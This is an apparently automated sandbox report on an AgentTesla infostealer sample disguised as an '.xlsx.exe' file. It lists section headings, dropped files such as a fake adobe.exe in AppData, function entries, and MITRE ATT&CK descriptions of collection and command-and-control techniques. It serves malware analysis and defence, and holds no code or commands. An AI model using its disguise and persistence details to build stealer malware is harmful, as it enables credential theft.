Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BL NBNSA240600050.xlsx.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\adobe.exe.log

C:\Users\user\AppData\Roaming\Adobe\adobe.exe

C:\Users\user\AppData\Roaming\Adobe\adobe.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
BL NBNSA240600050.xlsx.exe

Function 07E430F8 Relevance: 7.0, Strings: 5, Instructions: 739
COMMON

Function 030DD41B Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Function 030DD420 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 030DB1B0 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Function 030D590C Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Function 030D44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 07815038 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre